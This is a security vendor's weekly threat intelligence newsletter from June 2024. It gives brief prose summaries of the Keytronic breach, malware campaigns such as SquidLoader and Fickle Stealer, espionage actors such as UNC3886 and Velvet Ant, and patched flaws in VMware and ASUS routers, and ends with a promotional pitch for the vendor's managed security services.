The Ntirety Weekly Threat Intelligence Report: June 24, 2024
Welcome to Ntirety's Threat Intelligence Summary, where our elite Security and Threat Response Team delivers critical insights and expert analysis. Each report highlights the most pressing cyber threats and vulnerabilities currently active, to educate and raise awareness among our partners, customers, and the broader community. Committed to securing mission-critical data, Ntirety's managed security services proactively monitor and combat these threats to ensure the safety of our customers.
Industry Breaches
Keytronic: PCBA manufacturing giant Keytronic is warning it suffered a data breach after the Black Basta ransomware gang leaked 530 GB of the company’s stolen data. The threat actors claim that human resources, finance, engineering, and corporate data were stolen in the attack.
Threats to Watch
UNC3886: The China-nexus cyber espionage actor linked to the zero-day exploitation of security flaws in Fortinet, Ivanti, and VMware devices have been observed utilizing multiple persistence mechanisms in order to maintain unfettered access to compromised environments. The threat actor, UNC3886, has exploited many zero-day flaws including CVE-2022-42328, CVE-2022-22948, CVE-2023-20867, and CVE-2022-42475.
SquidLoader: Researchers have uncovered a new evasive malware loader named SquidLoader that spreads via phishing campaigns targeting Chinese organizations. The attack chain leverages phishing emails that come with attachments that masquerade as Microsoft Word documents but are actually binaries that pave the way for the execution of the malware.
Fickle Stealer: A new Rust-based information stealer malware called Fickle Stealer has been observed being delivered via multiple attack chains with the goal of harvesting sensitive information from compromised hosts. There are 4 different distribution methods including VBA dropper, VBA downloader, link downloader, and executable downloader.
Vortax: A widespread malicious campaign targeting cryptocurrency users and involving Vortax (a fake virtual meeting software) has been observed. Once installed, Vortax delivers three information stealers in cross-platform attacks in an extensive campaign aimed at cryptocurrency theft.
Markopolo: A threat actor who goes by the alias markopolo has been identified as behind a large-scale cross-platform scam that targets digital currency users on social media with information stealer malware. The attack chains involve using the virtual meeting software named Vortax that are used as a conduit to deliver Rhadamanthys, StealC, and Atomic macOS stealer.
VoidArachne: Chinese-speaking users are the target of a new threat activity cluster, dubbed Void Arachne, that employs malicious Windows Installer files for VPNs to deliver a C2 framework called Winos 4.0.
ONNX: A new phishing-as-a-service platform called ONNX Store is targeting Microsoft 365 accounts for employees at financial firms using QR codes in PDF attachments. The platform can target both M365 and O365 email accounts and operates via Telegram bots and features MFA bypass mechanisms.
Hijack Loader: Threat actors are luring unsuspecting users with free or pirated versions of commercial software to deliver a malware loader called Hijack Loader, which then deploys an information stealer known as Vidar Stealer. The adversaries had managed to trick users into downloading password-protected archive files containing trojanized copies of a Cisco Webex Meetings App.
TIKTAG: A new speculative execution attack named “TIKTAG” targets ARM’s Memory Tagging Extension to leak data with over a 95% chance of success, allowing hackers to bypass the security feature.
Velvet Ant: A group of suspected Chinese cyberespionage actors named “Velvet Ant” are deploying custom malware on F5 BIG-IP appliances to gain a persistent connection to the internal network and steal data. The attackers used compromised F5 BIG-IP appliances to retain persistence on the network, allowing them to gain access to the internal network while blending attacker traffic with legitimate network traffic, making detection more difficult.
VMware: VMware has released updates to address critical flaws impacting Cloud Foundation, vCenter Server, and vSphere ESXi that could be exploited to achieve privilege escalation and remote code execution.
Docker: Researchers have uncovered a new malware campaign that targets publicly exposed Docker API endpoints with the aim of delivering cryptocurrency minders and other payloads. An analysis of the campaign has revealed tactical overlaps with a previous activity dubbed Spinning YARN. The attack commences with the threat actors zeroing in on Docker servers with exposed ports to initiate a series of steps, starting with reconnaissance and privilege escalation before proceeding to the exploitation phase.
Fake Chrome: A new malware distribution campaign uses fake Google Chrome, Word and OneDrive errors to trick users into running malicious PowerShell “fixes” that install malware. The campaign was observed being used by multiple threat actors including those behind ClearFake, and the TA571 threat actor.
DISGOMOJI: A suspected Pakistan-based threat actor has been liked to a cyber espionage campaign targeting Indian government entities in 2024. The activity is being tracked under UTA0137 noting the adversary’s exclusive use of a malware called DISGOMOJI. The malware is written in Golang and is designed to infect Linux systems.
Smishing Triad: Pakistan has become the latest target of a threat actor called Smishing Triad. The group’s latest tactic involves sending malicious messages on behalf of Pakistan Post to customers of mobile carriers via iMessage and SMS.
NiceRAT: Threat actors have been observed deploying a malware called NiceRAT to co-opt infected devices with a botnet. The attacks have been targeting South Korean users and are designed to propagate malware under the guise of cracked software such as Microsoft Windows.
BadSpace: Legitimate but compromised websites are being sued as a conduit to deliver a Windows backdoor dubbed BadSpace under the guise of a fake browser updates. The threat actor employs a multi-stage attack chain involving an infected website, a C2 server and in some cases a fake browser update, and a DScript downloader to deploy a backdoor into the victim’s system.
ASUS: ASUS has released a new firmware update that addresses a vulnerability impacting 7 router models that allow remote attackers to log into devices. The flaw (CVE-2024-3080) is an authentication bypass vulnerability allowing unauthenticated, remote attackers to take control of the device.
Concerned about the security of your network, systems, applications, or data? Given the ever-growing list of cyber threats, your concerns are justified.
For over 25 years, Ntirety has been at the forefront of helping organizations anticipate and stay protected from both known and emerging cyber threats. Contact us to discover how our proactive managed security services can strengthen your organization's security posture and provide peace of mind.